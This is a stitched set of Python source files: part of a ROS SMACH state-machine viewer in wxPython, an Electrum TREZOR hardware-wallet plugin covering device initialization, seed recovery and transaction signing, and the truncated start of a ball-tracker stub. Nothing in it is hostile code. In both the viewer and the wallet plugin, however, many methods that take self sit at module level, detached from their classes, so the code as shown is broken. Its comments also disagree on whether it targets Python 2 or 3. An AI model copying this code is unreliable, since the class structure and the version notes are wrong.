    if not isinstance(item.url, str):
        return
    self.statusbar.SetStatusText(item.url)
    # Left button-up
    if event.ButtonUp(wx.MOUSE_BTN_LEFT):
        # Store this item's url as the selected path
        self._selected_paths = [item.url]
        # Update the selection dropdown
        self.path_input.SetValue(item.url)
        wx.PostEvent(
            self.path_input.GetEventHandler(),
            wx.CommandEvent(wx.wxEVT_COMMAND_COMBOBOX_SELECTED, self.path_input.GetId()))
        self.update_graph()
def selection_changed(self, event):
    """Event: Selection dropdown changed — display the selected container's
    userdata and toggle the "Set as Initial State" button accordingly."""
    path_input_str = self.path_input.GetValue()
    # Check the path is non-zero length
    if len(path_input_str) > 0:
        # Split the path (state:outcome), and get the state path
        path = path_input_str.split(':')[0]
        # Get the container corresponding to this path, since userdata is
        # stored in the containers; a leaf state falls back to its parent.
        if path not in self._containers:
            parent_path = get_parent_path(path)
        else:
            parent_path = path
        if parent_path in self._containers:
            # Enable the initial state button for the selection
            self.is_button.Enable()
            # Get the container
            container = self._containers[parent_path]
            # Store the scroll position and selection so the refresh below
            # does not jump the view around.
            pos = self.ud_txt.HitTestPos(wx.Point(0,0))
            sel = self.ud_txt.GetSelection()
            # Generate the userdata string
            # (iteritems: this file targets Python 2)
            ud_str = ''
            for (k,v) in container._local_data._data.iteritems():
                ud_str += str(k)+": "
                vstr = str(v)
                # Add a line break if this is a multiline value
                if vstr.find('\n') != -1:
                    ud_str += '\n'
                ud_str += vstr+'\n\n'
            # Set the userdata string
            self.ud_txt.SetValue(ud_str)
            # Restore the scroll position and selection
            self.ud_txt.ShowPosition(pos[1])
            if sel != (0,0):
                self.ud_txt.SetSelection(sel[0],sel[1])
        else:
            # Disable the initial state button for this selection
            self.is_button.Disable()
def _structure_msg_update(self, msg, server_name):
    """Update the structure of the SMACH plan (re-generate the dotcode).

    Called for each structure message from an introspection server; either
    updates an existing ContainerNode in place or registers a new one, and
    wakes the graph thread when a redraw is needed.
    """
    # Just return if we're shutting down
    if not self._keep_running:
        return
    # Get the node path
    path = msg.path
    pathsplit = path.split('/')
    parent_path = '/'.join(pathsplit[0:-1])
    rospy.logdebug("RECEIVED: "+path)
    rospy.logdebug("CONTAINERS: "+str(self._containers.keys()))
    # Initialize redraw flag
    needs_redraw = False
    if path in self._containers:
        rospy.logdebug("UPDATING: "+path)
        # Update the structure of this known container
        needs_redraw = self._containers[path].update_structure(msg)
    else:
        rospy.logdebug("CONSTRUCTING: "+path)
        # Create a new container
        container = ContainerNode(server_name, msg)
        self._containers[path] = container
        # Store this as a top container if it has no parent
        if parent_path == '':
            self._top_containers[path] = container
        # Append paths to selector
        self.path_combo.Append(path)
        self.path_input.Append(path)
        # We need to redraw the graph if this container's parent is already known
        if parent_path in self._containers:
            needs_redraw = True
    # Update the graph if necessary
    if needs_redraw:
        with self._update_cond:
            self._structure_changed = True
            self._needs_zoom = True # TODO: Make it so you can disable this
            self._update_cond.notify_all()
def _status_msg_update(self, msg):
    """Process status messages: track active/initial states, optionally
    auto-focus the view on the active path, and refresh the userdata pane."""
    # Check if we're in the process of shutting down
    if not self._keep_running:
        return
    # When auto-focus is on, follow the deepest active path reported in info
    if self._auto_focus and len(msg.info) > 0:
        self._set_path(msg.info)
        self._set_max_depth(msg.info.count('/')-1)
    # Get the path to the updating container
    path = msg.path
    rospy.logdebug("STATUS MSG: "+path)
    # Check if this is a known container
    if path in self._containers:
        # Get the container and check if the status update requires regeneration
        container = self._containers[path]
        if container.update_status(msg):
            with self._update_cond:
                self._update_cond.notify_all()
        # TODO: Is this necessary?
        # Re-fire the selection handler so the userdata pane refreshes when
        # the updated container (or its child) is currently displayed.
        path_input_str = self.path_input.GetValue()
        if path_input_str == path or get_parent_path(path_input_str) == path:
            wx.PostEvent(
                self.path_input.GetEventHandler(),
                wx.CommandEvent(wx.wxEVT_COMMAND_COMBOBOX_SELECTED,self.path_input.GetId()))
def _update_graph(self):
    """This thread continuously updates the graph when it changes.

    The graph gets updated in one of two ways:

      1: The structure of the SMACH plans has changed, or the display
      settings have been changed. In this case, the dotcode needs to be
      regenerated.

      2: The status of the SMACH plans has changed. In this case, we only
      need to change the styles of the graph.
    """
    while self._keep_running and not rospy.is_shutdown():
        with self._update_cond:
            # Wait for the update condition to be triggered
            self._update_cond.wait()
            # Get the containers to update
            containers_to_update = {}
            if self._path in self._containers:
                # Some non-root path
                containers_to_update = {self._path: self._containers[self._path]}
            elif self._path == '/':
                # Root path
                containers_to_update = self._top_containers
            # Check if we need to re-generate the dotcode (if the structure changed)
            # TODO: needs_zoom is a misnomer
            if self._structure_changed or self._needs_zoom:
                dotstr = "digraph {\n\t"
                dotstr += ';'.join([
                    "compound=true",
                    "outputmode=nodesfirst",
                    "labeljust=l",
                    "nodesep=0.5",
                    "minlen=2",
                    "mclimit=5",
                    "clusterrank=local",
                    "ranksep=0.75",
                    # "remincross=true",
                    # "rank=sink",
                    "ordering=\"\"",
                ])
                dotstr += ";\n"
                # Generate the rest of the graph
                # TODO: Only re-generate dotcode for containers that have changed
                # dict.items() instead of Python-2-only iteritems(): equivalent
                # here and keeps the code runnable under Python 3.
                for path, tc in containers_to_update.items():
                    dotstr += tc.get_dotcode(
                        self._selected_paths, [],
                        0, self._max_depth,
                        self._containers,
                        self._show_all_transitions,
                        self._label_wrapper)
                if len(containers_to_update) == 0:
                    dotstr += '"__empty__" [label="Path not available.", shape="plaintext"]'
                dotstr += '\n}\n'
                self.dotstr = dotstr
                # Set the dotcode to the new dotcode, reset the flags
                self.set_dotcode(dotstr, zoom=False)
                self._structure_changed = False
            # Update the styles for the graph if there are any updates
            for path, tc in containers_to_update.items():
                tc.set_styles(
                    self._selected_paths,
                    0, self._max_depth,
                    self.widget.items_by_url,
                    self.widget.subgraph_shapes,
                    self._containers)
            # Redraw
            self.widget.Refresh()
def set_dotcode(self, dotcode, zoom=True):
    """Set the xdot view's dotcode and refresh the display.

    dotcode -- graphviz source to hand to the xdot widget
    zoom    -- when True (or when a zoom was requested via _needs_zoom),
               re-fit the view after loading
    """
    # Set the new dotcode
    if self.widget.set_dotcode(dotcode, None):
        self.SetTitle('Smach Viewer')
        # Re-zoom if necessary
        if zoom or self._needs_zoom:
            self.widget.zoom_to_fit()
            self._needs_zoom = False
        # Set the refresh flag; an idle event triggers OnIdle to repaint
        self._needs_refresh = True
        wx.PostEvent(self.GetEventHandler(), wx.IdleEvent())
def _update_tree(self):
    """Background thread: rebuild the tree view whenever an update is signalled."""
    while self._keep_running and not rospy.is_shutdown():
        with self._update_cond:
            self._update_cond.wait()
            self.tree.DeleteAllItems()
            self._tree_nodes = {}
            # Iterate keys directly: the container values were unused, and
            # the previous iteritems() call is Python 2 only.
            for path in self._top_containers:
                self.add_to_tree(path, None)
def add_to_tree(self, path, parent):
    """Add *path* (and, recursively, its known children) to the tree view.

    parent -- wx tree item to attach to, or None to create the root item.
    """
    if parent is None:
        container = self.tree.AddRoot(get_label(path))
    else:
        container = self.tree.AppendItem(parent, get_label(path))
    # Add children to tree.  Test membership on the dict directly instead
    # of `.keys()` -- equivalent, and avoids building an intermediate list.
    for label in self._containers[path]._children:
        child_path = '/'.join([path, label])
        if child_path in self._containers:
            self.add_to_tree(child_path, container)
        else:
            # Leaf state with no container of its own
            self.tree.AppendItem(container, label)
def append_tree(self, container, parent = None):
    """Append an item to the tree view.

    Only the root case is implemented: when *parent* is None a root node
    is added with the container's immediate children; when a parent is
    given this method currently does nothing.
    """
    if not parent:
        node = self.tree.AddRoot(container._label)
        for child_label in container._children:
            self.tree.AppendItem(node,child_label)
def OnIdle(self, event):
    """Idle handler: repaint exactly once after a refresh was requested."""
    if not self._needs_refresh:
        return
    self.Refresh()
    # Clear the flag so subsequent idle events are no-ops until the next
    # set_dotcode() call re-arms it.
    self._needs_refresh = False
def _update_server_list(self):
    """Update the list of known SMACH introspection servers.

    Background thread: polls the introspection client once per second and
    subscribes to the structure/status topics of any server not seen yet.
    """
    while self._keep_running:
        # Update the server list
        server_names = self._client.get_servers()
        # Servers without a status subscription are new to us
        new_server_names = [sn for sn in server_names if sn not in self._status_subs]
        # Create subscribers for new servers
        for server_name in new_server_names:
            self._structure_subs[server_name] = rospy.Subscriber(
                server_name+smach_ros.introspection.STRUCTURE_TOPIC,
                SmachContainerStructure,
                callback = self._structure_msg_update,
                callback_args = server_name,
                queue_size=50)
            self._status_subs[server_name] = rospy.Subscriber(
                server_name+smach_ros.introspection.STATUS_TOPIC,
                SmachContainerStatus,
                callback = self._status_msg_update,
                queue_size=50)
        # This doesn't need to happen very often
        rospy.sleep(1.0)
        #self.server_combo.AppendItems([s for s in self._servers if s not in current_servers])
        # Grab the first server
        #current_value = self.server_combo.GetValue()
        #if current_value == '' and len(self._servers) > 0:
        #    self.server_combo.SetStringSelection(self._servers[0])
        #    self.set_server(self._servers[0])
def ShowControlsDialog(self, event):
    """Pop up a modal dialog listing the keyboard shortcuts."""
    help_text = "Pan: Arrow Keys\nZoom: PageUp / PageDown\nZoom To Fit: F\nRefresh: R"
    dialog = wx.MessageDialog(None, help_text, 'Keyboard Controls', wx.OK)
    dialog.ShowModal()
def SaveDotGraph(self, event):
    """Write the most recent dotcode to a time-stamped .dot file under ROS home."""
    directory = rospkg.get_ros_home()+'/dotfiles/'
    if not os.path.exists(directory):
        os.makedirs(directory)
    out_path = directory + time.strftime("%Y%m%d-%H%M%S") + '.dot'
    print('Writing to file: %s' % out_path)
    with open(out_path, 'w') as dot_file:
        dot_file.write(self.dotstr)
def OnExit(self, event):
    """Window-exit event handler; intentionally performs no cleanup here."""
    pass
def set_filter(self, filter):
    """Select the graphviz layout program (e.g. 'dot') used by the xdot widget."""
    self.widget.set_filter(filter)
def main():
    """Parse command-line options and launch the SMACH viewer GUI."""
    from argparse import ArgumentParser
    parser = ArgumentParser()
    parser.add_argument('-f', '--auto-focus',
                        action='store_true',
                        help="Enable 'AutoFocus to subgraph' as default",
                        dest='enable_auto_focus')
    options = parser.parse_args()

    app = wx.App()
    frame = SmachViewerFrame()
    frame.set_filter('dot')
    frame.Show()
    if options.enable_auto_focus:
        frame.toggle_auto_focus(None)
    app.MainLoop()
if __name__ == '__main__':
    # Start the ROS node before the GUI; disable_signals=True stops rospy
    # from installing its own signal handlers (wx owns the main loop).
    rospy.init_node('smach_viewer',anonymous=False, disable_signals=True,log_level=rospy.INFO)
    # rospy.myargv() strips ROS remapping arguments before argparse sees them
    sys.argv = rospy.myargv()
    main()
|
trezor.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled
from electrum.bitcoin import (xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum import constants
from electrum.i18n import _
from electrum.plugin import BasePlugin, Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods (see TrezorPlugin.initialize_device)
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# Seed-recovery input styles: plain scrambled-word entry vs. matrix entry
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
    """Keystore backed by a TREZOR hardware wallet."""
    hw_type = 'trezor'
    device = 'TREZOR'

    def get_derivation(self):
        # BIP32 derivation path prefix of this keystore
        return self.derivation

    def get_client(self, force_pair=True):
        """Return a (possibly newly paired) device client via the plugin."""
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        # Not supported by this device integration.
        raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign *message* with the key at derivation/<change>/<index>."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """Collect previous txns and xpub paths, then delegate signing to the plugin."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            # Legacy (non-segwit) inputs need the full previous transaction
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    #     libraries_available, libraries_URL, minimum_firmware,
    #     wallet_class, types

    firmware_URL = 'https://wallet.trezor.io'
    libraries_URL = 'https://github.com/trezor/python-trezor'
    minimum_firmware = (1, 5, 2)
    keystore_class = TrezorKeyStore
    minimum_library = (0, 9, 0)
    # Script types (electrum xtype names) this device can derive xpubs for
    SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
    MAX_LABEL_LEN = 32

    def __init__(self, parent, config, name):
        """Wire up trezorlib-backed transport/client classes if the libraries
        are importable; otherwise leave the plugin inert."""
        HW_PluginBase.__init__(self, parent, config, name)
        self.libraries_available = self.check_libraries_available()
        if not self.libraries_available:
            return
        # Imported lazily so a missing trezorlib only disables the plugin.
        from . import client
        from . import transport
        import trezorlib.messages
        self.client_class = client.TrezorClient
        self.types = trezorlib.messages
        self.DEVICE_IDS = ('TREZOR',)
        self.transport_handler = transport.TrezorTransport()
        self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
    """Return the installed trezorlib version, or 'unknown' when the
    package does not expose ``__version__``."""
    import trezorlib
    return getattr(trezorlib, '__version__', 'unknown')
def enumerate(self):
    """List connected TREZOR devices as generic Device records."""
    found = []
    for dev in self.transport_handler.enumerate_devices():
        path = dev.get_path()
        found.append(Device(path, -1, path, 'TREZOR', 0))
    return found
def create_client(self, device, handler):
    """Open a transport to *device*, sanity-check it and return a client.

    Returns None on any failure (no transport, ping failure, firmware too
    old).  When the firmware is outdated and no handler is available the
    error is raised instead of shown.
    """
    try:
        self.print_error("connecting to device at", device.path)
        transport = self.transport_handler.get_transport(device.path)
    except BaseException as e:
        self.print_error("cannot connect at", device.path, str(e))
        return None
    if not transport:
        self.print_error("cannot connect at", device.path)
        return
    self.print_error("connected to device at", device.path)
    client = self.client_class(transport, handler, self)
    # Try a ping for device sanity
    try:
        client.ping('t')
    except BaseException as e:
        self.print_error("ping failed", str(e))
        return None
    if not client.atleast_version(*self.minimum_firmware):
        msg = (_('Outdated {} firmware for device labelled {}. Please '
                 'download the updated firmware from {}')
               .format(self.device, client.label(), self.firmware_URL))
        self.print_error(msg)
        if handler:
            handler.show_error(msg)
        else:
            raise Exception(msg)
        return None
    return client
def get_client(self, keystore, force_pair=True):
    """Return the device client paired with *keystore* (pairing it when
    *force_pair* is set), marking it as recently used."""
    devmgr = self.device_manager()
    handler = keystore.handler
    # hid_lock serialises access to the HID layer across threads
    with devmgr.hid_lock:
        client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
    # returns the client for a given keystore. can use xpub
    if client:
        client.used()
    return client
def get_coin_name(self):
    """Coin name passed to the device: 'Testnet' on testnet, else 'Bitcoin'."""
    if constants.net.TESTNET:
        return "Testnet"
    return "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
    """Ask the user how to initialize the device, then run the chosen
    method on a background thread while the wizard event loop spins.

    Raises UserCancelled when initialization does not finish successfully.
    """
    # Initialization method
    msg = _("Choose how you want to initialize your {}.\n\n"
            "The first two methods are secure as no secret information "
            "is entered into your computer.\n\n"
            "For the last two methods you input secrets on your keyboard "
            "and upload them to your {}, and so you should "
            "only do those on a computer you know to be trustworthy "
            "and free of malware."
            ).format(self.device, self.device)
    choices = [
        # Must be short as QT doesn't word-wrap radio button text
        (TIM_NEW, _("Let the device generate a completely new seed randomly")),
        (TIM_RECOVER, _("Recover from a seed you have previously written down")),
        (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
        (TIM_PRIVKEY, _("Upload a master private key"))
    ]
    devmgr = self.device_manager()
    client = devmgr.client_by_id(device_id)
    model = client.get_trezor_model()

    def f(method):
        import threading
        settings = self.request_trezor_init_settings(wizard, method, model)
        t = threading.Thread(
            target=self._initialize_device_safe,
            args=(settings, method, device_id, wizard, handler))
        # `daemon` attribute instead of Thread.setDaemon(), which is
        # deprecated; a daemon thread cannot keep the process alive.
        t.daemon = True
        t.start()
        exit_code = wizard.loop.exec_()
        if exit_code != 0:
            # this method (initialize_device) was called with the expectation
            # of leaving the device in an initialized state when finishing.
            # signal that this is not the case:
            raise UserCancelled()

    wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
    """Run _initialize_device, reporting any failure to the handler and
    always exiting the wizard's event loop with a status (0 = success)."""
    exit_code = 0
    try:
        self._initialize_device(settings, method, device_id, wizard, handler)
    except UserCancelled:
        exit_code = 1
    except BaseException as e:
        traceback.print_exc(file=sys.stderr)
        handler.show_error(str(e))
        exit_code = 1
    finally:
        # Unblocks wizard.loop.exec_() in initialize_device
        wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
    """Perform the device-side initialization for the chosen TIM_* method.

    settings is the tuple produced by request_trezor_init_settings.
    """
    item, label, pin_protection, passphrase_protection, recovery_type = settings

    if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
        # Warn up-front: word entry on the device cannot be corrected.
        handler.show_error(_(
            "You will be asked to enter 24 words regardless of your "
            "seed's actual length. If you enter a word incorrectly or "
            "misspell it, you cannot change it or go back - you will need "
            "to start again from the beginning.\n\nSo please enter "
            "the words carefully!"),
            blocking=True)

    language = 'english'
    devmgr = self.device_manager()
    client = devmgr.client_by_id(device_id)

    if method == TIM_NEW:
        strength = 64 * (item + 2)  # 128, 192 or 256
        u2f_counter = 0
        skip_backup = False
        client.reset_device(True, strength, passphrase_protection,
                            pin_protection, label, language,
                            u2f_counter, skip_backup)
    elif method == TIM_RECOVER:
        word_count = 6 * (item + 2)  # 12, 18 or 24
        client.step = 0
        if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
            recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
        else:
            recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
        client.recovery_device(word_count, passphrase_protection,
                               pin_protection, label, language,
                               type=recovery_type_trezor)
        if recovery_type == RECOVERY_TYPE_MATRIX:
            handler.close_matrix_dialog()
    elif method == TIM_MNEMONIC:
        pin = pin_protection  # It's the pin, not a boolean
        client.load_device_by_mnemonic(str(item), pin,
                                       passphrase_protection,
                                       label, language)
    else:
        pin = pin_protection  # It's the pin, not a boolean
        client.load_device_by_xprv(item, pin, passphrase_protection,
                                   label, language)
def _make_node_path(self, xpub, address_n):
    """Deserialize *xpub* into a trezorlib HDNodePathType with suffix path
    *address_n* (list of child indices)."""
    _, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
    node = self.types.HDNodeType(
        depth=depth,
        # fingerprint/child_num are serialized big-endian in the xpub
        fingerprint=int.from_bytes(fingerprint, 'big'),
        child_num=int.from_bytes(child_num, 'big'),
        chain_code=chain_code,
        public_key=key,
    )
    return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
    """Prepare a device for use in the install wizard, initializing it
    first if it has no seed yet."""
    devmgr = self.device_manager()
    device_id = device_info.device.id_
    client = devmgr.client_by_id(device_id)
    if client is None:
        raise Exception(_('Failed to create a client for this device.') + '\n' +
                        _('Make sure it is in the correct state.'))
    # fixme: we should use: client.handler = wizard
    client.handler = self.create_handler(wizard)
    if not device_info.initialized:
        self.initialize_device(device_id, wizard, client.handler)
    # Fetching an xpub forces pairing/PIN entry now rather than later
    client.get_xpub('m', 'standard')
    client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
    """Fetch the xpub at *derivation* for script type *xtype* from the device.

    Raises ScriptTypeNotSupported for xtypes outside SUPPORTED_XTYPES.
    """
    if xtype not in self.SUPPORTED_XTYPES:
        raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
    devmgr = self.device_manager()
    client = devmgr.client_by_id(device_id)
    client.handler = wizard
    xpub = client.get_xpub(derivation, xtype)
    client.used()
    return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
    """Map an electrum txin type to the trezorlib InputScriptType value.

    Raises ValueError for unknown types.
    """
    script_types = self.types.InputScriptType
    mapping = {
        'p2wpkh': script_types.SPENDWITNESS,
        'p2wsh': script_types.SPENDWITNESS,
        'p2wpkh-p2sh': script_types.SPENDP2SHWITNESS,
        'p2wsh-p2sh': script_types.SPENDP2SHWITNESS,
        'p2pkh': script_types.SPENDADDRESS,
        'p2sh': script_types.SPENDMULTISIG,
    }
    try:
        return mapping[electrum_txin_type]
    except KeyError:
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
    """Map an electrum txin type to the trezorlib OutputScriptType value.

    Raises ValueError for unknown types.
    """
    script_types = self.types.OutputScriptType
    mapping = {
        'p2wpkh': script_types.PAYTOWITNESS,
        'p2wsh': script_types.PAYTOWITNESS,
        'p2wpkh-p2sh': script_types.PAYTOP2SHWITNESS,
        'p2wsh-p2sh': script_types.PAYTOP2SHWITNESS,
        'p2pkh': script_types.PAYTOADDRESS,
        'p2sh': script_types.PAYTOMULTISIG,
    }
    try:
        return mapping[electrum_txin_type]
    except KeyError:
        raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
    """Sign *tx* on the device and write the signatures back into it.

    prev_tx   -- map tx_hash -> previous transaction (for legacy inputs)
    xpub_path -- map xpub -> derivation path used by tx_inputs()
    """
    self.prev_tx = prev_tx
    self.xpub_path = xpub_path
    client = self.get_client(keystore)
    inputs = self.tx_inputs(tx, True)
    outputs = self.tx_outputs(keystore.get_derivation(), tx)
    signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
    # Append the sighash type byte ('01') expected by electrum's serializer
    signatures = [(bh2u(x) + '01') for x in signatures]
    tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
    """Display *address* on the device screen for visual verification.

    For multisig wallets a MultisigRedeemScriptType is built so the device
    can reconstruct and verify the redeem script.
    """
    if keystore is None:
        keystore = wallet.get_keystore()
    if not self.show_address_helper(wallet, address, keystore):
        return
    client = self.get_client(keystore)
    if not client.atleast_version(1, 3):
        keystore.handler.show_error(_("Your device firmware is too old"))
        return
    change, index = wallet.get_address_index(address)
    derivation = keystore.derivation
    address_path = "%s/%d/%d"%(derivation, change, index)
    address_n = client.expand_path(address_path)
    xpubs = wallet.get_master_public_keys()
    if len(xpubs) == 1:
        script_type = self.get_trezor_input_script_type(wallet.txin_type)
        client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
    else:
        def f(xpub):
            return self._make_node_path(xpub, [change, index])
        pubkeys = wallet.get_public_keys(address)
        # sort xpubs using the order of pubkeys
        sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
        pubkeys = list(map(f, sorted_xpubs))
        multisig = self.types.MultisigRedeemScriptType(
            pubkeys=pubkeys,
            signatures=[b''] * wallet.n,
            m=wallet.m,
        )
        script_type = self.get_trezor_input_script_type(wallet.txin_type)
        client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
    """Convert electrum tx inputs into trezorlib TxInputType messages.

    for_sig -- when True, also attach derivation paths / multisig data so
    the device can sign; when False (previous-tx lookup) only the outpoint
    and scriptSig are needed.
    """
    inputs = []
    for txin in tx.inputs():
        txinputtype = self.types.TxInputType()
        if txin['type'] == 'coinbase':
            prev_hash = b"\x00"*32
            prev_index = 0xffffffff  # signed int -1
        else:
            if for_sig:
                x_pubkeys = txin['x_pubkeys']
                if len(x_pubkeys) == 1:
                    # Single-sig: give the device the full derivation path
                    x_pubkey = x_pubkeys[0]
                    xpub, s = parse_xpubkey(x_pubkey)
                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                    txinputtype._extend_address_n(xpub_n + s)
                    txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
                else:
                    # Multisig: describe the redeem script via node paths
                    def f(x_pubkey):
                        xpub, s = parse_xpubkey(x_pubkey)
                        return self._make_node_path(xpub, s)
                    pubkeys = list(map(f, x_pubkeys))
                    multisig = self.types.MultisigRedeemScriptType(
                        pubkeys=pubkeys,
                        signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
                        m=txin.get('num_sig'),
                    )
                    script_type = self.get_trezor_input_script_type(txin['type'])
                    txinputtype = self.types.TxInputType(
                        script_type=script_type,
                        multisig=multisig
                    )
                    # find which key is mine
                    for x_pubkey in x_pubkeys:
                        if is_xpubkey(x_pubkey):
                            xpub, s = parse_xpubkey(x_pubkey)
                            if xpub in self.xpub_path:
                                xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                txinputtype._extend_address_n(xpub_n + s)
                                break
            prev_hash = unhexlify(txin['prevout_hash'])
            prev_index = txin['prevout_n']
        if 'value' in txin:
            txinputtype.amount = txin['value']
        txinputtype.prev_hash = prev_hash
        txinputtype.prev_index = prev_index
        if txin.get('scriptSig') is not None:
            script_sig = bfh(txin['scriptSig'])
            txinputtype.script_sig = script_sig
        txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
        inputs.append(txinputtype)
    return inputs
def tx_outputs(self, derivation, tx):
    """Convert electrum tx outputs into trezorlib TxOutputType messages.

    At most one output belonging to the wallet is sent "by derivation"
    (so the device treats it as change and hides it from the user); all
    others are sent as plain address/script outputs.
    """

    def create_output_by_derivation():
        # Output owned by this wallet: identify it by derivation path
        script_type = self.get_trezor_output_script_type(info.script_type)
        if len(xpubs) == 1:
            address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
            txoutputtype = self.types.TxOutputType(
                amount=amount,
                script_type=script_type,
                address_n=address_n,
            )
        else:
            address_n = self.client_class.expand_path("/%d/%d" % index)
            pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
            multisig = self.types.MultisigRedeemScriptType(
                pubkeys=pubkeys,
                signatures=[b''] * len(pubkeys),
                m=m)
            txoutputtype = self.types.TxOutputType(
                multisig=multisig,
                amount=amount,
                address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
                script_type=script_type)
        return txoutputtype

    def create_output_by_address():
        # External output: plain address, or OP_RETURN payload
        txoutputtype = self.types.TxOutputType()
        txoutputtype.amount = amount
        if _type == TYPE_SCRIPT:
            txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
            txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
        elif _type == TYPE_ADDRESS:
            txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
            txoutputtype.address = address
        return txoutputtype

    outputs = []
    has_change = False
    any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)

    for o in tx.outputs():
        _type, address, amount = o.type, o.address, o.value
        use_create_by_derivation = False

        info = tx.output_info.get(address)
        if info is not None and not has_change:
            index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
            on_change_branch = index[0] == 1
            # prioritise hiding outputs on the 'change' branch from user
            # because no more than one change address allowed
            # note: ^ restriction can be removed once we require fw
            # that has https://github.com/trezor/trezor-mcu/pull/306
            if on_change_branch == any_output_on_change_branch:
                use_create_by_derivation = True
                has_change = True

        if use_create_by_derivation:
            txoutputtype = create_output_by_derivation()
        else:
            txoutputtype = create_output_by_address()
        outputs.append(txoutputtype)

    return outputs
def electrum_tx_to_txtype(self, tx):
    """Convert an electrum Transaction into a trezorlib TransactionType
    (used to supply previous transactions during signing)."""
    t = self.types.TransactionType()
    if tx is None:
        # probably for segwit input and we don't need this prev txn
        return t
    d = deserialize(tx.raw)
    t.version = d['version']
    t.lock_time = d['lockTime']
    inputs = self.tx_inputs(tx)
    t._extend_inputs(inputs)
    # Outputs are passed as raw scripts (bin_outputs), not parsed addresses
    for vout in d['outputs']:
        o = t._add_bin_outputs()
        o.amount = vout['value']
        o.script_pubkey = bfh(vout['scriptPubKey'])
    return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
    """Look up a previous transaction by hash and convert it for trezorlib."""
    previous = self.prev_tx[tx_hash]
    return self.electrum_tx_to_txtype(previous)
|
BallTrackerStub.py | # BallTrackerStub
# Singleton class for keeping an observable coordinates of a ball, found via camera input
import time
import random
import threading
class BallTracker:
    """Observable stub that emits fake ball coordinates once per second.

    Singleton: obtain it via BallTracker.get_instance() rather than
    constructing directly.  Observers must expose a notify(*args, **kwargs)
    method.
    """

    # Singleton instance
    instance = None

    @staticmethod
    def get_instance():
        """Return the shared BallTracker, creating it on first use."""
        if BallTracker.instance is None:
            BallTracker.instance = BallTracker()
        return BallTracker.instance

    def __init__(self):
        self.observers = []
        # Polled by the tracking loop; stop_ball_tracking() clears it.
